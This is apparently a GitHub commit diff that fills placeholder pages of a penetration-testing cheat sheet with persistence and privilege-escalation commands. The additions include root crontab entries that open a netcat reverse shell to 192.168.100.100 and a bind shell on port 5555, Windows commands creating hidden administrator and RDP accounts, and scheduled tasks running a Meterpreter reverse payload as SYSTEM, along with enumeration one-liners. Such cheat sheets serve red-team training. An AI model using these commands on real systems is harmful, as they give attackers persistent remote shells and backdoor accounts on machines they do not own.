File tree 4 files changed +36
-2
lines changed
4 files changed +36
-2
lines changed Original file line number Diff line number Diff line change 11# Place Holder
22
3+ ## Add a new cron job to the current user's crontab that will try to connect back to 192.168.100.100:50224 every 10 minutes:
4+ ``` (crontab -u root -l; echo "*/10 * * * * nc 192.168.100.100 50224 -e /bin/bash") | crontab -u root - ```
5+
6+ ## Add a new cron job to the current user's crontab that will try to open a bind port every 10 minutes on port 5555:
7+ ``` (crontab -u root -l; echo "*/10 * * * * nc -lvp 5555 -e /bin/bash") | crontab -u root - ```
8+
39Content coming. Feel free to submit ;-)
Original file line number Diff line number Diff line change 11# Place Holder
22
3- Content coming. Feel free to submit ;-)
3+ ## 1 List Writeable Cron Directories
4+ ``` ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null ```
5+ ### Credit
6+ http://www.securitysift.com/download/recon_scan.zip
7+
8+ More content coming. Feel free to submit ;-)
Original file line number Diff line number Diff line change 11# Place Holder
22
3+ ## Add an Administrator
4+ ``` net user adm adm1 /add ```
5+ ``` net localgroup administrators adm /add ```
6+
7+ ## Add a Limited User with RDP Access
8+ ``` net user lowlevel lowlevel1 /add ```
9+ ``` net localgroup "Remote Desktop USers" lowlevel /add ```
10+
11+ ## Schedule a Bind or Reverse EXE Payload to Run
12+ ``` schtasks /create /TN "WindowsTaskSys1" /TR "C:\Users\low\reverse_met_https_v2.exe" /sc MINUTE ```
13+
14+ ## Scheduel a Bind or Reverse EXE Payload to Run as SYSTEM
15+ ``` schtasks /create /TN "WindowsTaskSys1" /TR "C:\Users\low\reverse_met_https_v2.exe" /sc MINUTE /RU "SYSTEM" ```
16+
317Content coming. Feel free to submit ;-)
Original file line number Diff line number Diff line change 11# Place Holder
22
3- Content coming. Feel free to submit ;-)
3+ ## 1 Get Permissions On Service Executables
4+ - 1a. Generate list of executables
5+ ``` for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> C:\windows\temp\msntemp.tmp ```
6+ - 1b. List Permissions - \Users:(I)(F) would be nice :)
7+ ``` for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\msntemp.tmp) do cmd.exe /c icacls "%a" ```
8+ #### Credit
9+ https://www.linkedin.com/pub/ben-clark/8/116/644
10+
11+
12+ More content coming. Feel free to submit ;-)
You can’t perform that action at this time.
0 commit comments